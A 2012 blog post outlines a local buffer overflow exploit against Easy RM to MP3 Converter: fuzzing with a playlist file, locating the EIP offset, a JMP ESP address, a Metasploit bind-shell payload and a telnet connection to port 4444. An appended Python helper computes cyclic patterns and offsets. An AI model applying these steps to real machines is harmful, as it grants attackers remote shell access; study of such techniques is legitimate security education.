=======================================================

Monday, September 24, 2012

Buffer Overflow: Local Exploit (Easy RM 2 MP3 Converter)

Now I will try a local exploitation. The application used for the exploitation is Easy RM to MP3 Converter. Tools used:
a. OllyDbg
b. Python
c. Application (Easy RM to MP3 Converter)

  NOTE :

# After each change to the fuzzer script, save it and run it again.

( python <file.py> )




Let's do this job:

1. Run Windows XP and install Easy RM to MP3 Converter.

2. Create a fuzzer file with a Python script that writes a playlist file (.m3u, .pls etc.).
      ==> run Fuzz.py ==> # python Fuzz.py
      ==> creates the fuzzer file (playlist file).

3. Run the application and try to load the playlist file (crash.pls).
     ==> If the fuzzer succeeds, the application will crash (close automatically).

4. Run the application again under OllyDbg to see the overwritten registers.
     ==> Result: EBX and ESP are overwritten with the character "B".

5. Create a pattern with Metasploit ==> ./create_pattern 60000 > file.txt

6. Modify the fuzzer script with the pattern.

7. Look for the offset position.

8. Check the position of the EIP register ==> \xEF\xBE\xAD\xDE
     ==> Run python <file>.py

9. Look for a JUMP ESP address
     ==> JUMP ESP address => 7CA7A787 => ( little endian ) => \x87\xA7\xA7\x7C

10. Generate the payload with msfweb ==> Windows Bind Shell
     ==> Generate payload

11. Modify the fuzzer script with the payload.

12. Run the fuzzer script to create the final playlist file with the payload content.
     ==> Run telnet => # telnet 192.168.56.101 4444

 == DONE ==
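Steps 5 to 9 rest on two small calculations: a cyclic pattern in which every 4-byte window is unique within one cycle, so the value that lands in EIP identifies the offset in the playlist file, and the little-endian byte order in which a 32-bit address such as 7CA7A787 is written into the file. The Python below is an added example of both, written for this post; it is not the author's Fuzz.py and not Metasploit's own tool, and the function names and the sample register value 41336141 are constructed for the illustration. It also covers the caveat a 60000-byte pattern introduces: one cycle is only 20280 bytes, so the same 4 bytes recur and every candidate offset is returned.

```python
import itertools
import string
import struct


def _triples():
    # Metasploit-style alphabet: "Aa0", "Aa1", ..., "Zz9" (26*26*10 = 6760 triples,
    # 20280 bytes). Within one cycle every 4-byte window occurs exactly once.
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                yield (upper + lower + digit).encode()


def pattern_create(length):
    """Return a cyclic pattern of exactly `length` bytes (like pattern_create)."""
    out = bytearray()
    for triple in itertools.cycle(_triples()):  # cycle() repeats past 20280 bytes
        out += triple
        if len(out) >= length:
            return bytes(out[:length])


def register_to_bytes(hex_value):
    """Convert a 32-bit value as OllyDbg shows it (e.g. '7CA7A787') to the order in
    which those bytes sit in the file on x86: b'\\x87\\xa7\\xa7\\x7c'."""
    return struct.pack("<I", int(hex_value, 16))


def pattern_offsets(pattern, hex_value):
    """Return every offset at which the bytes that ended up in a register start.

    A pattern longer than one cycle (20280 bytes) repeats, so more than one offset
    may come back; the crash must then be re-checked (e.g. with \\xEF\\xBE\\xAD\\xDE
    at the candidate offset, as in step 8) to pick the right one.
    """
    needle = register_to_bytes(hex_value)
    hits = []
    start = pattern.find(needle)
    while start != -1:
        hits.append(start)
        start = pattern.find(needle, start + 1)
    return hits


if __name__ == "__main__":
    # Constructed sample: EIP read as 41336141 in the debugger is the window "Aa3A",
    # which starts at offset 9 of the pattern (and again once per repeated cycle).
    pat = pattern_create(60000)
    print(pattern_offsets(pat, "41336141"))
    print(register_to_bytes("7CA7A787"))
```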

